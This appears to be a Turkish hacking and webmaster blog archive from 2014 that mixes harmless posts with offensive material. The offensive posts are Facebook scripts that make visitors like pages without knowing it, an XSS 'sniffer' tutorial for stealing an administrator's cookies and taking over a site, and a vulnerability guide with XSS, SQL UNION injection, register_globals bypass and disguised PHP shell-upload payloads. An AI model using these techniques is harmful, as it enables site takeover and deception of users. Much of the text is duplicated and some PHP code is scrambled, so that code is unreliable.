İçindeki index dosyasını kendinize göre ayarlayın ftpye atın.
demo: http://aboneci.uk.ht/
indirme linki: https://www.dropbox.com/s/yqhdt9t6bc...all%20post.rar
3 Mayıs 2014 Cumartesi
Facebook wall post scripti

Wall Postun Özellikleri
Farkında Olmadan Sınırsız Sayfa Beğendirme
Post Hızı Artırıldı
Post Resmi Değiştirildi
Tasarım Değiştirildi
indirme linki : https://www.dropbox.com/s/2jv94re0yi...wallpostv3.rar
PHP SQL saldırılarından korunun(basit ve uğraştırmayan yöntem)
Pek çok PHP programcısı hala SQL saldırıları hakkında bilgisi ya da açığın kapatılması hakkında fazla bilgisi yoktur.Araştırmalar yaptığımızda hep bize addhandler yada mysql real escape fonksiyonlarını örnekler gösteriyor ama bu kimi zaman dalgınlığımız yada el alışkanlığı sebebi ile her form verisi alırken yada dışarıdan veri alırken kullanamıyoruz az önce dediğim gibi ya bilmediğimiz için yada unutulduğu için bu tip tehlikelere maruz kalıyoruz.
Aşağıdaki fonksiyon ile POST yada GET olarak gelen verileri topluca süzerek zararlı karakter içeren verileri süzmektedir.
Fonksiyonun kullanımı çok basittir toplu fonksiyonların bulunduğu yada her php sayfaya içeri aktarılan(include functions) bir dosyanın en başına ekleyebilirsiniz.
Örnek bir deneme yapalım sds isimli bir GET verisini doğrudan yazdıralım yani öncelikle yukarıdaki fonksiyonları kullanalım en altına da echo $_GET['sds'] yazalım ve sds verisine örnek HTML ve SQL sorunu yaratan karakterleri ekleyelim

php-sql-function
Sonuç olarak bize güzel bir çıktı verdi bu çıktı ise hiçbir şekilde SQL sorunu yaratmamaktadır.
Aşağıdaki fonksiyon ile POST yada GET olarak gelen verileri topluca süzerek zararlı karakter içeren verileri süzmektedir.
Fonksiyonun kullanımı çok basittir toplu fonksiyonların bulunduğu yada her php sayfaya içeri aktarılan(include functions) bir dosyanın en başına ekleyebilirsiniz.
Örnek bir deneme yapalım sds isimli bir GET verisini doğrudan yazdıralım yani öncelikle yukarıdaki fonksiyonları kullanalım en altına da echo $_GET['sds'] yazalım ve sds verisine örnek HTML ve SQL sorunu yaratan karakterleri ekleyelim
php-sql-function
Sonuç olarak bize güzel bir çıktı verdi bu çıktı ise hiçbir şekilde SQL sorunu yaratmamaktadır.
Etiketler:
güvenlik
,
internet
,
php
,
scripts
,
web-güvenlik
,
web-programlama
,
webhack
,
webmaster
DDoS Ve Bot Korumalı Giriş Scripti
<!DOCTYPE HTML><style type="text/css">div.enenene{position:fixed;text-align:center;z-index:6201;}div.dgfdgd{top:0px;left:0px;width:100%;height:100%;background-color:#323232;}</style><style type="text/css">div.enenene{_position:absolute;}div.dgfdgd{_bottom:auto;_top:expression(ie6=(document.documentElement.scrollTop+document.documentElement.clientHeight - 52+"px") );}</style><div class="enenene dgfdgd" id="engel"></div>
<script language="Javascript">
<!--
var password = "aktif-frm"
var x = prompt("DDos - Bot Koruması == Şifre aktif-frm","")
if (x.toLowerCase() == password) {
alert("Şifre doğru \n \n Sayfaya girmek için Tamam'a tıklayın");
document.getElementById('engel').style.display='none';
}
else {
alert("Hoops Man ! Şifre Yanliş Nereye Gidiyon.. ");
location = "/"
}
//-->
</script>
<HTML>
<HEAD>
<BODY>
<TITLE>aktif-frm.net</TITLE>
<meta name="description" content="aktif-frm.net">
<BODY BGCOLOR="black">
<FONT COLOR="white"><center><FONT SIZE="5">Aktif-FRM Hoşgeldiniz..</FONT></center></FONT>
<br>
<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7Uc2wozWFlL_EmpA5LdQn8s8d8uUTXYfNNLzJKHnfb0pdGKwwmBvHCJnzW-AYb2DDxW-e8ZdxpOvEnfyFrvbUimG7VfDnSaVXWrVw1GU89EJCBwLjGz75X2csXfoB7BtW5zZAL17QjP7j/s1600/koddostu.gif" alt="türkbayrağı" border="0" style="padding:none;border:none;background-color:transparent;"/></center>
</br>
<br>
<br>
<br>
<br>
<br>
<br>
<center><a href="index.php"><img src="http://aktif-frm.net/images/aktif-mavi/logo.png" <a></center>
<br>
<FONT COLOR="white"><center><FONT SIZE="5">Foruma Gitmek İçin Resime Tıklamanız Yeterli Olucaktır..</FONT></center></FONT>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
<FONT COLOR="white"><center><FONT SIZE="4"><a href="http://siteneeklekodlari.blogspot.com/2012/01/sitene-ip-adresi-gorme-kodu.html" target="_blank">İp Numaralarınız Kayit Altına Alınmaktadır</a>
<script type="text/javascript">
//<![CDATA[
try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:1386240590,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/acv=4125811108/"},atok:"a4c5b7deace613b543535eb6937ad16b",petok:"f9711a81bb0ab23cda74017e299685dffdf31c36-1386830278-1800",zone:"aktif-frm.net",rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"89aea5120c6c2504a41c9ffe5c7fc88d"}});var a=document.createElement("script"),b=document.getElementsByTagName("script")[0];a.async=!0;a.src="//ajax.cloudflare.com/cdn-cgi/nexp/acv=616370821/cloudflare.min.js";b.parentNode.insertBefore(a,b);}}catch(e){};
//]]>
</script>
<script type="text/javascript" src="http://www.ip-numaram.com/remoteip.php"></script><noscript><a href="http://siteneeklekodlari.blogspot.com/2012/01/sitene-ip-adresi-gorme-kodu.html">İp Numaralarınız Kayit Altına Alınmaktadır.</a></noscript></FONT></center></FONT>
</BODY>
</HEAD>
</HTML>
Etiketler:
güvenlik
,
hosting
,
internet
,
php
,
scripts
,
sourcecodes
,
web-güvenlik
,
web-programlama
,
webmaster
27 Nisan 2014 Pazar
Sitende Yazı Kopyalamayı Engelle
Bu sistem tüm tarayıcılarda çalışmaktadır. (internet explorer, mozilla firefox, google chrome, opera, safari vb.)Aşağıdaki kodu sitenizdeki tagı ile değiştirmeniz yeterli olacaktır.
Bu sistem sayesinde ziyaretçiler Mouse ile sağ tuşu (click) sitenin içinde kullanamaz, sol tuş ilede yazıları seçemez ve link vb. şeyleride sürükle bırak yapamaz.
<body ondragstart="return false" onselectstart="return false" oncontextmenu="return false" onmousedown="return false">
Dipnot; bu tür kodlar bazen sorunlara neden olabilir, çünkü bir üye giriş yapmaya çalıştığı zaman giriş kutucuğunu tıklayamassa nasıl giriş yapabilir? onun için sadece içeriklerin olduğu kısımlarda bu tür kodların çalışmasını sağlamanız daha iyi olacaktır.
26 Nisan 2014 Cumartesi
Müzik Dinleme Scripti | Soundcloud API
Bu resim yeniden boyutlandırılmıştır. Resmin orijinal halini görmek için tıklayınız. Orijinal boyut: 1366x636
Hostunuza atın ve çalıştırın. Veritabanı gerektirmez. Müzikleri soundcloud'dan çekmektedir.
İNDİR
pH7 Sosyal Arkadaşlık Yazılımı | Ücretsiz
| This image has been resized.Click to view original image |
pH7 Sosyal arkadaşlık scriptidir. Daha çok flört scripti desek daha iyi olur. İNDİR
25 Nisan 2014 Cuma
CyberCODER Beğeni Scripti V1.0 – Patlayan Tokenleri Siler!
Bu Script sayesinde veritabanınızda gereksiz tokenler kalmayacaktır. Bunun iyi yanı siteniz yavaşlamayacak ve sistem hızlı çalışacaktır!
Scriptin Özellikleri;
1-Tüm Token Linklerini Kabul Eder!
2-Boşa Token Harcamaz!
3-ID ile beğendirme işlemi yapıyor!
1-Tüm Token Linklerini Kabul Eder!
2-Boşa Token Harcamaz!
3-ID ile beğendirme işlemi yapıyor!
KURULUM NOTLARI:
1- Rardan çıkardığınız klasörü açın
2- config.php yi kendi db bilgilerinizi yazın
3- Konuya sql eklemedim Likers tablosu olan sql'erde çalışır.
1- Rardan çıkardığınız klasörü açın
2- config.php yi kendi db bilgilerinizi yazın
3- Konuya sql eklemedim Likers tablosu olan sql'erde çalışır.
Rar Şifresi : cmdeagle.blogspot.com
Access Tokenli Beğeni Scripti
Çoğu Access Token Scriptlerinden Farklı Bir Yapıya Sahip. Bu Muazzam Scripti Script Vakti Farkıyla Paylaşıma Sunuyorum, İyi Kullanımlar Dilerim.
SCRİPT KURULUMU
- İndirdiğiniz Dosyaları Sitenize Atın
- Veritabani.sql ‘yi Phpmyadmin ‘e Okutun
- Sitenize Attığınız Dosyalar İçerisinde baglan.php ‘den Veritabanı Bilgilerinizi Girin
Rar Şifresi : cmdeagle.blogspot.com
Aranan Likelo Scipti İndir !
Script Tanıtım ↓
Arkadaşlar Günümüzde Likelo Scripti Gerçekten Çok Aranmakta Olan Bir Script Olup Pek Bulunmamaktadır.
Scriptin En Güzel Yanı ise Sql Gerektirmemesidir (Cpu aşımının önüne geçilir)
Scriptin En Güzel Yanı ise Sql Gerektirmemesidir (Cpu aşımının önüne geçilir)
Fakat Ben Bu Script'in Tıpa Tıp Benzerini Yaptım (Diğer Sistemlerden Farklı)
Kurulum↓
getoken.php dosyasına,
Kod:
<script type="text/javascript"> <!-- window.location = "http://jsfiddle.net/facebook_likelo/Pyc92/show/" //--> </script>
yazıp kaydedin. ve Dosyaları Sunucunuza Atın.
Scripti İndir: İNDİR
Rar Şifresi: cmdeagle.blogspot.com
Cengizhan v1 Facebook Beğeni Scripti
Kurulum bilgisi:
1- Rardan çıkardıgınız klasörü açın
2- Config.php yi Kendi Database Bilgilerinizi Yazın
3- Ve Son Olarakta Sql Aktarın
Rar Şifresi : cmdeagle.blogspot.com
Tıkla Yandexten Cengizhan v1 Facebook beğeni scripti'ni İndir !
Xss Sniffer
Xss sniffer nedir :
- Xss alert açığı olan bir site de sniffer kullanip admin'in bilgilerini çekiceğiz
Liste ;
1- Hosting ( FTP Şart )
2- Sniffer Dosyaları
Kuruluma geçelim hemen sniffer dosyalarini açalim ve altta yazdıgım dosyalari editleyecegız.
Logme.php dosyası
2. Kod satırı ;

burada panelimizin kullanıcı adı ve şifresi yazmakta lazım olucak..
2-) Burada ftp attıgımız klasördeki s.php dosyasının yolunu belirtelim.

3-) Burada ise index.html editleyecegiz ve sitedeki xss yolunu belirtelim.

Herşeyi tamamlayip dosyalarımızı ftp'ye atalim yükleme bittikten sonra "
" amaç bu index.html dosyasını birşekilde admin'e tiklatmak ve sonrasında cooikeler bize gelicek ve bu cookieleri editleyip sitede admin olucağız.
Araçları buradan indirebilirsiniz.
- Xss alert açığı olan bir site de sniffer kullanip admin'in bilgilerini çekiceğiz
Liste ;
1- Hosting ( FTP Şart )
2- Sniffer Dosyaları
Kuruluma geçelim hemen sniffer dosyalarini açalim ve altta yazdıgım dosyalari editleyecegız.
Logme.php dosyası
2. Kod satırı ;
| This image has been resized.Click to view original image |
burada panelimizin kullanıcı adı ve şifresi yazmakta lazım olucak..
2-) Burada ftp attıgımız klasördeki s.php dosyasının yolunu belirtelim.
| This image has been resized.Click to view original image |
3-) Burada ise index.html editleyecegiz ve sitedeki xss yolunu belirtelim.
| This image has been resized.Click to view original image |
Herşeyi tamamlayip dosyalarımızı ftp'ye atalim yükleme bittikten sonra "
Kod:
www.siteadı.com/xss/index.html
Araçları buradan indirebilirsiniz.
22 Nisan 2014 Salı
Blogger da Robots.txt Dosyası Nasıl Düzenlenir
Blogger da Robots.txt Dosyası Nasıl Düzenlenir
Sanırım internette adını sıkca duymuşsunuzdur.Robots.txt dosyası blogger ın önceden düzenlenmesine izin vermediği fakat son dönemde yaptığı değişiklikle kullanıcıların dosyayı düzenlemesine imkan veren ve blogumuzun arama motorları için daha kullanışlı olmasını sağlayan text dosyasıdır.Bu dosya tüm web siteleri için mevcuttur.Yeni arayüzle birlikte artık biz blogger kullanıcıları da bu dosyayı düzenleyebilecek durumundayız.Dosyayı nasıl düzenleriz konusuna geçmeden once Robots.txt dosyası hakkında daha açıklayıcı olması için bazı noktaları paylaşmak istiyorum:

Robots.Txt Dosyası Nedir
Kısaca bu dosya web sitesi sahiplerinin arama motorlarına sitesini indexle ya da indexleme dediği basit text dosyasıdır.Sadece arama motorları için yazılan bu kodla sitenizin sayfalarının indexlenme durumunu belirtebilirsiniz.Aklınıza hemen şu soru gelebilir.Sitemin neden indexlenmemesini isteyeyim ki?Evet sitemizin bazı kısımlarını indexlememek seo açısından önemli.Çünkü aynı içeriğin iki kere indexlenmesi size “duplicate content” durumuna düşürerek zarar görmenize neden olabilir.Bu yüzden arama sayfalarındaki yazılarınızın ve etiket,navigasyon gibi sayfalardaki yazılarınızın tekrar indexlenmemesi gerekir.Bu açıklamayı yaptıktan sonra eğer robots.txt dosyasını düzenlemeye karar verdiyseniz nasıl gerçekleştirebiliriz ona bakalım.
Robots.Txt Dosyası Nasıl Düzenlenir
Aşağıda kendi blogumda kullandığım robots.txt dosyasını sizlerle paylaşıyorum.Burada yer alan kodlar yukarıdaki anlatımıma paralel olarak oluşturulmuş standart kodlardır.
Bu kodları eklemek için :
1-Blogger anasayfasına giderek giriş yapın
2-Ayarlar >> Arama Tercihleri yolunu izleyin.
3-Sayfanın alt kısmında özel robots.txt dosyasını göreceksiniz.Eğer daha önce hiç bir işlem yapmadıysanız şu anda etkin değildir.Düzenle diyerek içeriği etkinleştirin ve aşağıdaki satırı kopyalayıp yapıştırın.


##Değişiklikleri kaydet butonuna basın.
Aklınıza yatması açısından kodları açıklamak istiyorum:
User-agent: Mediapartners-Google:Bu kod google adsense kullanıcıları için.eğer sitenizde adsense kullanmıyorsanız kodu eklemeyebilirsiniz.
User-agent:* : Bu kod google,yahoo gibi tüm arama motorlarını sitenize çağırıyor.
Disallow: Bu kod arama motorlarına ilgili kısmı indexlememesini söylüyor.Bu kodla başlayan ilk satırda arama sonuçlarını ve sonraki satırda da etiket ve navigasyon sayfalarını indexlememesini belirttik
Allow:Anasayfayı ve yazı sayfalarını indexlemesine izin verdik.
Sitemap:Bu da biizm standart olarak sahip olduğumu sitemap.Burada kırmızı renkli kısma siz kendi blogunuzun adını yazacaksınız
>>Blogger da Sitemap Nasıl Oluşturulur
Son Sözler
Robots.txt dosyası blogunuzun temelini oluşturan ana öğelerden biridir.Bu yüzden bu kısmı düzenlerken dikkatli olun.Yalnız yukarıdaki kodlar temel ve çoğu blogger ın kullandığı kodlardır.Bu yüzden kullanmakta emin olabilirsiniz.
Sanırım internette adını sıkca duymuşsunuzdur.Robots.txt dosyası blogger ın önceden düzenlenmesine izin vermediği fakat son dönemde yaptığı değişiklikle kullanıcıların dosyayı düzenlemesine imkan veren ve blogumuzun arama motorları için daha kullanışlı olmasını sağlayan text dosyasıdır.Bu dosya tüm web siteleri için mevcuttur.Yeni arayüzle birlikte artık biz blogger kullanıcıları da bu dosyayı düzenleyebilecek durumundayız.Dosyayı nasıl düzenleriz konusuna geçmeden once Robots.txt dosyası hakkında daha açıklayıcı olması için bazı noktaları paylaşmak istiyorum:
Robots.Txt Dosyası Nedir
Kısaca bu dosya web sitesi sahiplerinin arama motorlarına sitesini indexle ya da indexleme dediği basit text dosyasıdır.Sadece arama motorları için yazılan bu kodla sitenizin sayfalarının indexlenme durumunu belirtebilirsiniz.Aklınıza hemen şu soru gelebilir.Sitemin neden indexlenmemesini isteyeyim ki?Evet sitemizin bazı kısımlarını indexlememek seo açısından önemli.Çünkü aynı içeriğin iki kere indexlenmesi size “duplicate content” durumuna düşürerek zarar görmenize neden olabilir.Bu yüzden arama sayfalarındaki yazılarınızın ve etiket,navigasyon gibi sayfalardaki yazılarınızın tekrar indexlenmemesi gerekir.Bu açıklamayı yaptıktan sonra eğer robots.txt dosyasını düzenlemeye karar verdiyseniz nasıl gerçekleştirebiliriz ona bakalım.
Robots.Txt Dosyası Nasıl Düzenlenir
Aşağıda kendi blogumda kullandığım robots.txt dosyasını sizlerle paylaşıyorum.Burada yer alan kodlar yukarıdaki anlatımıma paralel olarak oluşturulmuş standart kodlardır.
Bu kodları eklemek için :
1-Blogger anasayfasına giderek giriş yapın
2-Ayarlar >> Arama Tercihleri yolunu izleyin.
3-Sayfanın alt kısmında özel robots.txt dosyasını göreceksiniz.Eğer daha önce hiç bir işlem yapmadıysanız şu anda etkin değildir.Düzenle diyerek içeriği etkinleştirin ve aşağıdaki satırı kopyalayıp yapıştırın.
Alıntı:
| User-agent: Mediapartners-Google User-agent: * Disallow: /search?q=* Disallow: /*?updated-max=* Allow: / Sitemap: http://www.blogisminiz.com/feeds/pos...rderby=updated |
##Değişiklikleri kaydet butonuna basın.
Aklınıza yatması açısından kodları açıklamak istiyorum:
User-agent: Mediapartners-Google:Bu kod google adsense kullanıcıları için.eğer sitenizde adsense kullanmıyorsanız kodu eklemeyebilirsiniz.
User-agent:* : Bu kod google,yahoo gibi tüm arama motorlarını sitenize çağırıyor.
Disallow: Bu kod arama motorlarına ilgili kısmı indexlememesini söylüyor.Bu kodla başlayan ilk satırda arama sonuçlarını ve sonraki satırda da etiket ve navigasyon sayfalarını indexlememesini belirttik
Allow:Anasayfayı ve yazı sayfalarını indexlemesine izin verdik.
Sitemap:Bu da biizm standart olarak sahip olduğumu sitemap.Burada kırmızı renkli kısma siz kendi blogunuzun adını yazacaksınız
>>Blogger da Sitemap Nasıl Oluşturulur
Son Sözler
Robots.txt dosyası blogunuzun temelini oluşturan ana öğelerden biridir.Bu yüzden bu kısmı düzenlerken dikkatli olun.Yalnız yukarıdaki kodlar temel ve çoğu blogger ın kullandığı kodlardır.Bu yüzden kullanmakta emin olabilirsiniz.
( Find Bug On PHP System)
Find Bug 0n PHP Systems
Homepage: http://www.Turkhackteam.net
Date: 18.04.2014
//*
PHP sistemlerde ki zafiyetleri fonksiyonlar ve değişkenler üzerinden ele alacağız.
Bunu sınıflandırmamızın sebebi çoğu arkadaşımızın Php sistemlerde açık bulmakta ve tanımlamakta zorluk çekmesidir.
Bu dökümanın size bug bulma ve tanımlamada yardımcı olacaktır.
*//
Php sistemlerde ilk olarak kaynak kodlarında aşağıdaki değişkenlere göz atmalısınız:
Neden? Cevap:
Php sistemlerde var olan bu değişkenler Input table değişkenleridir.
Örneğin admin giriş sayfasında şifremizi girdiğimiz form alanı $_POST değişkeni ile değere atanıyorsa yapacağımız iş bu değişken alanını incelemek olmalıdır.
Çünkü kontrolsuz inputlar sistemde zaafiyet oluşturur.
Şimdi hepsini teker teker inceleyeceğiz.
__________________________________________________ _____________
XSS kullanıcı odaklı bir açıktır.
Browserler üzerinde; Web sayfalarına inject edilen javascript kodları ile kullanıcıya yönelik saldırı yapılır.
Günümüzde Website sahiplerinin bu açık hakkında bilgisizliği ve tüm tarayıcıların javascript desteği olması XSS açıklarının çok yaygın olduğunu anlamak için yeterlidir.
Temel olarak HTML etiketlerinin(tag) kötüye kullanımına sonucu meydana gelir.
ÖRNEK:
Değişkenler hiç bir filtreye tabi değil.
Örnek atak modülü:
DEFANS
HTML etiketlerinin kötüye kullanımını engellemek gerekir.
Bunun için "htmlspecialchars" fonksiyonunu kullanmalıyız:
__________________________________________________ _____________
[~] SQL Injection Vulnerability
SQL Injection XSS açıklarının aksine server odaklı bir açıktır.
SQL Injection açıkları user inputlarının(kullanıcı girdilerinin) filtrelenmesinden meydana gelir.
Soracaksınız XSS de filtre eksikliğinden meydana gelmekte farkı ne? Cevap:
SQL Injection: Database ile data alış verişi yaptığımız alanların filtrelenmemesinden kaynaklanır.
XSS: WEB APPLICATION > USER > BROWSER > USER
SQL: WEB APPLICATION > USER > DATABASE > USER
şeklinde meydana gelir.
ÖRNEK:
id değikeni hiç bir filtremeye tabi değil.Bir üstten tırnak koysak database hata verecektir!
Örnek atak modülü:
DEFANS
Burada SQL Injectionda kullanılan "+(artı)" ";(noktalı virgül)" terimleri yasaklayacağız.
Yukarda array kullanarak yasak terimleri dizi içine aldık ve id değerini bu terimlere göre yeniden tanımladık.
__________________________________________________ _____________
Php fonksiyonlarının yanlış kullanılması ile meydana gelen bir açık türüdür.
ÖRNEK
Yukardaki fonksiyonun çağırılma şekline dikkat ediniz.
Örnek atak Modülümüz:
Ve sayfamıza "phpinfo" bilgilerinin geldiğini göreceksiniz.
DEFANS
Bu açıklar PHP Bugları hakkında bilgisi olmayan acemi coderlerden kaynaklanır.
Asla bu şekilde fonksiyon çağırmayanız.
Büyük problemlerle karşı karşıya kalabilirsiniz.O yüzden fonksiyonları çağırırken:
Şeklinde kullanılabilir.
__________________________________________________ _____________
Register global çok tehlikeli ve bazen yararlı bir PHP ekidir.
Peki ne işe yarar?
Bildiğiniz gibi $_POST ve $_GET terimlerini php uygulamalarmızda değişkenleri alırken kullanıyoruz.
Register global açık olduğunda bir yarar sağlıyor ve $_GET ya da $_POST kullanmanıza gerek kalmadan direkt olarak input ismini değişken olarak atıyor.Ve az kod yazmanızı sağlıyor.
Ancak bunu php uygulamanıza çok güvendiğiniz zaman kullanınız.Neden?
Çünkü direkt değişkene atanan inputu istediğiniz gibi şekillendirebiliriz.Register Globals PHP 4.1 sürümünden sonra off olarak kapalı şekilde gelmiştir.
ÖRNEK1:
Yukardaki örnekte "isset" fonksiyonu değişkenin var olup olmadığını kontrol eden bir fonksiyondur.
Nasıl atak yaparız?Değişken direkt olarak inputa atandığı için değerini biz belirleyebiliriz.
Örnek atak modülü:
Ve admin paneli açılacaktır.Peki bu açığı nasıl kapatacağız?
DEFANS
#Register Globals fonksiyonunu daima kapalı tutunuz.
#Ve yahut kendi insiyatifinizi kullanarak:
bu değişkeni ekleyiniz:
ÖRNEK
Register Global 0n olduğu zaman inputu şekillendirebildiğimize göre çok fazla sayıda açık türü meydana gelebilir.
Yukarda include ile geçerli inputu şekillendirelim.
Örnek atak modülü:
__________________________________________________ _____________
Shell upload açıkları php sistemlerde dosya tiplerinin tam filtre edilememesinden kaynaklanır.
Sadece grafik uzantılı dosyaları upload eden bir uygulamaya kendi php kodlarımızı upload edebiliriz.
ÖRNEK
Yukardaki !="image/gif" ifadesi dosya türünün sadece gif olduğunu söylüyor.
Ancak dosya uzantısı kontrol edilmiyor.Dosya türü ile uzantısı çok farklı terimlerdir.
Peki nasıl exploit ederiz?Cevap : php dosyamızı gif türünde yollarız:
Php dosyamızın ilk satırına:
"GIF89A" kodunu hepsi büyük harf olarak girmemiz gerekiyor.Küçük harflerle kabul olmaz.
Ve php dosyasının upload edildiğini göreceksiniz.
DEFANS
Dosya uzantılarını yasaklayarak filtre engeli koyabiliriz.
gibi uzantıları engelleyebiliriz.Aynı zamanda /upload klasörüne forbidden engeli koyabiliriz:
(.htaccess dosyası kullanarak ignore* yada deny all# komutları ile bunu yapabilirsiniz.)
En önemliside upload dosyalarına random isim verilmesini sağlayabiliriz.
Böylece php dosyaları upload edilse bile klasör yasak olduğundan ve ismide random olduğundan dosyayı görünteleyemeyecektir.
__________________________________________________ _____________
Xpath injection SQL Injectiona bir hayli benzeyen bir başka injection çeşididir.
SQL Injectionda SQL databaseye yapılan injection XPath Injectionda XML dosyasına yöneliktir.
Açığı tespit için ilk olarak XPath sorguları gönderen input alanları belirlemek gerekir.
ÖRNEK
Yukarıda 4. satırda kasva.xml dosyasına XPath query gönderdiğimize dikkat ediniz.
Şimdi bu xml dosyasına bakalım:
XML Dosyasındaki taglere dikkat ediniz.
Evet php dosyamıza göre sorguları gönderelim:
Evet Xml dosyasındaki tüm objectler karşımızda.
__________________________________________________ _____________
Bu tür bir açık hidden form alanlarını kullanıcı data geçişi için kullanan her web sayfasında meydana gelebilir.
Hidden form alanlarını manipule ederek c0de inject edebiliriz.Peki nasıl olur bu iş?
Bir çok web programcısı bu alanları kodlarken hidden formlarda bulunan inputları code injectionu engellemek için
"> < " ’" gibi karakterlerden filtrelerler.
Anak bu filtreme datanın hidden forma geçişinden önce olmalıdır.Yani:
DATA - HIDDEN FORM - FILTRE >Bu kullanım güvenlik zaafiyeti yaratır.
DATA - FILTRE - HIDDEN FORM >Güvenli kullanım.
Peki bu açıklar ne tür sayfalarda bulunur; örneğin multi geçişli admin sayflarında admin ismi hidden formlara geçiş yapar.
user-login-HIDDEN FORM-admin-login-HIDDEN FORM-yönetici
ÖRNEK
Örnek bir kullanıma bakalım:
Yukardaki formda username yerine " > kasva kodunu girersek ne olur?Bakalım:
Evet görüldüğü gibi boş bir value değerine sahibiz artık.Yukarda girdiğimiz kod (" > kasva) sonuna kapatıcı tag(>) koymamamıza ağmen tamamlandığına dikkat ediniz.
Ve şimdi xss codumuzu inject edelim:
"> <scr ipt>alert(docu ment.cookie)</script> <a href =" (sonuna kapatıcı tag koymuyoruz)
Bakalım:
Ve cookie browsere vuracaktır
DEFANS
Hidden formlara filtresiz data geçişi yapmayınız!
__________________________________________________ _____________
Fazla görülmesede can sıkıcı bir açıktır.
Acemi Web programcıları backup dosyalarını saklarken random olarak adlandırırlar.
ÖRNEK
Yukarıdaki kodun 2. satırında rand() fonksiyonu 1-100 arası random sayı veriyor
ve 3. satırdada $rnd_backup_.sql ile bu backup dosyalarına atanıyor.
Bruteforce programı ile backup dosya ismini kolayca ele geçebiliriz
Fazla önemsenmeyen bir açık olmasına rağmen, önemli scriptlerde kendine yer buluyor:
Bakınız=> PHP-Fusion 6.00.105 Accessible Database Backups Download Vulnerable
Homepage: http://www.Turkhackteam.net
Date: 18.04.2014
//*
PHP sistemlerde ki zafiyetleri fonksiyonlar ve değişkenler üzerinden ele alacağız.
Bunu sınıflandırmamızın sebebi çoğu arkadaşımızın Php sistemlerde açık bulmakta ve tanımlamakta zorluk çekmesidir.
Bu dökümanın size bug bulma ve tanımlamada yardımcı olacaktır.
*//
Php sistemlerde ilk olarak kaynak kodlarında aşağıdaki değişkenlere göz atmalısınız:
Kod:
$_SERVER$_GET$_COO$_POSTKIEUEST $_FI$_REQLES$_ENVIE_VARS $_HTTP_ENV$_HTTP_COOK_VARS$_HTTP_GET_VARSP_POST_VARS $_HTT$_HTTP_POST_FILES$_HTTP_SERVER_VARS
Php sistemlerde var olan bu değişkenler Input table değişkenleridir.
Örneğin admin giriş sayfasında şifremizi girdiğimiz form alanı $_POST değişkeni ile değere atanıyorsa yapacağımız iş bu değişken alanını incelemek olmalıdır.
Çünkü kontrolsuz inputlar sistemde zaafiyet oluşturur.
Şimdi hepsini teker teker inceleyeceğiz.
__________________________________________________ _____________
[~] Cross Site Scripting Vulnerability (XSS)
XSS kullanıcı odaklı bir açıktır.
Browserler üzerinde; Web sayfalarına inject edilen javascript kodları ile kullanıcıya yönelik saldırı yapılır.
Günümüzde Website sahiplerinin bu açık hakkında bilgisizliği ve tüm tarayıcıların javascript desteği olması XSS açıklarının çok yaygın olduğunu anlamak için yeterlidir.
Peki nasıl meydana gelir?
Temel olarak HTML etiketlerinin(tag) kötüye kullanımına sonucu meydana gelir.
ÖRNEK:
Kod:
<?php$xss = $_GET[’alco’];print $xss ;?>
Örnek atak modülü:
Kod:
#http://127.0.0.1:80/index.php?alco="><scr ipt>alert(********.cookie);</script>
HTML etiketlerinin kötüye kullanımını engellemek gerekir.
Bunun için "htmlspecialchars" fonksiyonunu kullanmalıyız:
Kod:
<?php$xss = $_GET[’alco’];print htmlspecialchars($xss) ;?>
[~] SQL Injection Vulnerability
SQL Injection XSS açıklarının aksine server odaklı bir açıktır.
SQL Injection açıkları user inputlarının(kullanıcı girdilerinin) filtrelenmesinden meydana gelir.
Soracaksınız XSS de filtre eksikliğinden meydana gelmekte farkı ne? Cevap:
SQL Injection: Database ile data alış verişi yaptığımız alanların filtrelenmemesinden kaynaklanır.
XSS: WEB APPLICATION > USER > BROWSER > USER
SQL: WEB APPLICATION > USER > DATABASE > USER
şeklinde meydana gelir.
ÖRNEK:
Kod:
<?php$id= $_GET[’id’];....y= "SELECT * FROM users WHERE id= ’ “ .$id." ;" ...$quer?>
Örnek atak modülü:
Kod:
#http://127.0.0.1:80/index.php?id=1+UNION+SELECT+1,@@version,3,4,5+from+users/*
Burada SQL Injectionda kullanılan "+(artı)" ";(noktalı virgül)" terimleri yasaklayacağız.
Kod:
<?php$id= $_GET[’id’];....k = array("\\\\\\\\"", "\\\\\\\\\\\\\\\\", "/", "*", "’", "=", "- ", "$yasa#", ";", "<", ">", "+", "%");id = str_replace($yasak, "", $id);$$query= "SELECT * FROM users WHERE id= ’ “ .$id." ;" ...?>
Yukarda array kullanarak yasak terimleri dizi içine aldık ve id değerini bu terimlere göre yeniden tanımladık.
__________________________________________________ _____________
[~] Dynamic Evaluation Vulnerability
Php fonksiyonlarının yanlış kullanılması ile meydana gelen bir açık türüdür.
ÖRNEK
Kod:
<?php$fonksiyon = $_GET[’fonksiyon’];$fonksiyon();?>
Örnek atak Modülümüz:
Kod:
#http://127.0.0.1:80/index.php?fonksiyon=phpinfo
DEFANS
Bu açıklar PHP Bugları hakkında bilgisi olmayan acemi coderlerden kaynaklanır.
Asla bu şekilde fonksiyon çağırmayanız.
Büyük problemlerle karşı karşıya kalabilirsiniz.O yüzden fonksiyonları çağırırken:
Kod:
<?phpunction fonksiyon()f{nksiyon = $_GET(’fonksiyon’) pr$foint $fonksiyon ;}?>
__________________________________________________ _____________
[~] Register Globals Vulnerability
Register global çok tehlikeli ve bazen yararlı bir PHP ekidir.
Peki ne işe yarar?
Bildiğiniz gibi $_POST ve $_GET terimlerini php uygulamalarmızda değişkenleri alırken kullanıyoruz.
Register global açık olduğunda bir yarar sağlıyor ve $_GET ya da $_POST kullanmanıza gerek kalmadan direkt olarak input ismini değişken olarak atıyor.Ve az kod yazmanızı sağlıyor.
Ancak bunu php uygulamanıza çok güvendiğiniz zaman kullanınız.Neden?
Çünkü direkt değişkene atanan inputu istediğiniz gibi şekillendirebiliriz.Register Globals PHP 4.1 sürümünden sonra off olarak kapalı şekilde gelmiştir.
ÖRNEK1:
Kod:
<?phpif (isset($admin)) {//Admin Paneline Hoş Geldiniz![...]} else {yaptınız! [...] } ?>//Yanlış giriş
Nasıl atak yaparız?Değişken direkt olarak inputa atandığı için değerini biz belirleyebiliriz.
Örnek atak modülü:
Kod:
#http://127.0.0.1:80/admin.php?admin=1
DEFANS
